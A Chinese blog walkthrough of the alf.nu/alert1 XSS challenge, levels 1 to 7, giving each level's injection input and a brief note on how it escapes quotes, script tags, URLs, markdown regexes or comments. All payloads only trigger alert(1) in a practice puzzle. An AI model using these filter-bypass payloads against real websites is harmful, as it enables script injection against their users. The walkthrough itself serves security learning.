alf.nu/alert1 XSS 1-7

NO.1 Warmup

Input:
");alert(1)//

NO.2 Adobe

Input:
\");alert(1)//

本关对输入的双引号进行了转义,再加一个反斜杠转义回来即可

NO.3 JSON

Input:
</script><script>alert(1);//

本关使用JSON.stringify()进行过滤,反斜杠也被过滤掉,但可以用script标签进行分割

NO.4 JavaScript

Input:
%22);alert(1)//


javascript伪协议:

<a href="javascript:void(0)">Content</a>

 

当浏览器装载这样的URL时,它将执行这个URL中包含的Javascript代码,并把最后一条javascript语句的字符串值作为新文档的内容显示出来。这个字符串可以含有HTML标记,并被格式化,其显示与其他装载进浏览器的文档类型完全相同

因为最后传递到url中所以用url编码绕过

NO.5 Markdown

Input:
[[1|http://onerror='alert(1)']]


本题主要考察正则有关知识
先是过滤掉了小于号和双引号,然后
[[1|http://onerror='alert(1)']]“.replace(/(http:\/\/\S+)/g, ‘$1‘);
结果为:
[[1|<a href="http://onerror='alert(1)']]">http://onerror='alert(1)']]</a>
然后
[[1|<a href="http://onerror='alert(1)']]">http://onerror='alert(1)']]</a>“.text = text.replace(/[[(\w+)|(.+?)]]/g, ‘<img alt="$2" src="$1.gif">‘);
结果:<img alt="<a href="http://onerror='alert(1)'" src="1.gif">">http://onerror='alert(1)']]</a>

注意这里要用onerror而不是onload因为图片注定会加载失败

NO.6 DOM

Input:
Comment# --><script>alert(1)</script><!--


Function.apply(obj,args):

obj:这个对象将代替Function类里this对象
args:这个是数组,它将作为参数传给Function(args–>arguments)
apply方法能劫持另外一个对象的方法,继承另外一个对象的属性

先用document.createComment()创建注释,然后再绕过注释

NO.7 Callback

Input:
'#';alert(1);//

被单引号包围的双引号会被当成字符串处理,所以在这里前后都使用单引号,绕过双引号的限制


—— soporbear.github.io/2018/06/03/alf.nu-XSS

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值